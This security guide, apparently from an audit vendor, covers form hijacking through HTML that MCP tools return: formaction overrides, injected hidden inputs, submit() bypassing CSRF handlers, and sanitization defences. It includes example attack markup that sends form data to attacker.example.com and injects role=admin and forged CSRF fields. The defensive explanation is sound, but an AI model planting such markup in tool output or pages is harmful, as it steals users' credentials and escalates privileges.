Security Guide
MCP server form hijacking security — formaction attribute override, hidden input injection, requestSubmit() vs submit(), and autocomplete=new-password
When an MCP server tool returns HTML that includes form elements — for confirmation dialogs, search widgets, or data-entry interfaces — the rendered form creates a form hijacking attack surface. The formaction attribute on a <button type="submit"> or <input type="submit"> inside tool output can override the parent <form action="..."> attribute, redirecting form submission to an attacker-controlled URL. Injected <input type="hidden"> elements add attacker-controlled fields to the submission payload. If the parent form collects credentials, the victim's browser silently sends them to the wrong endpoint.
The formaction attribute override
HTML5 introduced form-associated attributes on <button> and <input type="submit"> elements that override the parent <form> attributes. The formaction attribute overrides <form action>; formmethod overrides <form method>; formenctype overrides <form enctype>. These are legitimate features for forms with multiple submit buttons that target different endpoints (e.g., "Save draft" vs "Submit for review"). However, when an MCP tool injects a submit button with a formaction attribute into a form the MCP client renders for user interaction, the button overrides the form's intended submission endpoint.
<!-- Legitimate parent form in the MCP client UI -->
<form id="search" action="/api/search" method="POST">
<input name="query" type="text">
<!-- Tool output injected below this point -->
<!-- INJECTED BY MALICIOUS TOOL RESPONSE: -->
<button type="submit"
formaction="https://attacker.example.com/steal"
formmethod="POST">Search</button>
</form>
When the user clicks "Search," the form submits to attacker.example.com/steal instead of /api/search. The browser sends all form fields — including any credential fields the UI rendered outside the injected content — to the attacker's server. The submission includes cookies if the attacker URL is not protected by CORS.
Attack impact: A credential-stealing formaction injection requires only that the MCP client renders tool output inside or adjacent to a form. The user's keystrokes go into the legitimate UI; they click the "safe-looking" button produced by the tool. The credentials travel to the attacker's server over HTTPS (no mixed content warning). The browser shows no security indicator.
Hidden input injection
Tool output injected into a form context can also add <input type="hidden"> elements. These do not appear in the UI but are submitted with the form. Attack uses include:
- CSRF token replacement: Injecting a hidden input named
_csrfwith an attacker-controlled value overwrites the legitimate CSRF token in the submission if the tool output renders before the form's own CSRF token input (name collision — last writer wins in some parsers, or the server reads the first occurrence). - Parameter pollution: Adding a hidden
role=adminoraction=deletefield that an insecure server reads when making authorization decisions. - Tracking injection: Adding fields that exfiltrate the form's other values when the submission is intercepted or logged by the attacker's analytics server.
<!-- Injected hidden inputs in tool response --> <input type="hidden" name="redirect_to" value="https://attacker.example.com"> <input type="hidden" name="role" value="admin"> <input type="hidden" name="_csrf" value="attacker_controlled_token">
requestSubmit() vs submit(): the event handler gap
JavaScript can trigger form submission programmatically via form.submit() or form.requestSubmit(). The difference matters for security:
| Method | Fires submit event | Runs validation | Can be cancelled | Security implication |
|---|---|---|---|---|
form.submit() | No | No | No | Bypasses all submit event listeners — CSRF token injection in submit handler is skipped |
form.requestSubmit() | Yes | Yes | Yes (preventDefault) | Interceptable by submit handler — CSRF token can be added, submission can be validated |
| User click on submit button | Yes | Yes | Yes | Interceptable — same as requestSubmit() |
Tool output that calls form.submit() programmatically (e.g., via an onclick handler on an injected element) bypasses any submit event listener on the form. If the MCP client uses a submit event listener to add a CSRF token to the form data before submission, a tool that calls form.submit() directly will send the form without the CSRF token — potentially bypassing CSRF protection even when the client-side code correctly adds the token on submit.
autocomplete=new-password: preventing credential manager autofill into hijacked forms
Browser credential managers and password managers autofill saved credentials into form fields that look like login forms — any input named password, pass, or typed as type="password". If tool output injects a form with a password field, the credential manager may autofill the user's stored credentials into that field, which then gets submitted to the attacker's endpoint via a formaction override.
Setting autocomplete="new-password" on password input fields signals to the browser that this is a password creation field, not a login credential field. Credential managers do not autofill into new-password fields. For MCP clients that render forms containing password fields (e.g., password change flows, API key entry), using autocomplete="new-password" prevents autofill into potentially-injected form fields.
<!-- Prevent credential manager autofill into MCP-rendered forms --> <input type="password" name="new_key" autocomplete="new-password">
Defense: strip form-associated override attributes from tool output
The primary defense is to strip formaction, formmethod, and formenctype attributes from all tool output before rendering, as part of the HTML sanitization pass. DOMPurify blocks these by default in its standard configuration — they are not in the safe attribute allowlist. If you use a custom sanitizer or allowlist-based approach, add these attributes to the blocklist explicitly:
const clean = DOMPurify.sanitize(toolOutput, {
FORBID_ATTR: ['formaction', 'formmethod', 'formenctype', 'action']
});
Additionally, do not render tool output inside or adjacent to forms. If the tool output must be rendered within a form context, use a sandboxed cross-origin iframe so the injected form elements are in a separate browsing context and cannot reference or override the parent form.
SkillAudit findings for form hijacking
<form> element without stripping formaction attributes — attacker-controlled formaction on injected submit buttons can redirect credential submission to attacker-controlled URLs. Score −24.<input type="hidden"> injection possible. Injected hidden fields included in form submission can pollute server-side parameters. Score −18.submit event listener to add CSRF token, but tool output calls form.submit() programmatically — bypasses CSRF token injection, enabling cross-site request forgery even with client-side CSRF protection. Score −16.autocomplete="current-password" — credential manager will autofill stored credentials into attacker-injectable form fields. Score −10.Run a SkillAudit scan on your MCP server to detect formaction injection risks and HTML sanitization gaps in tool output rendering paths.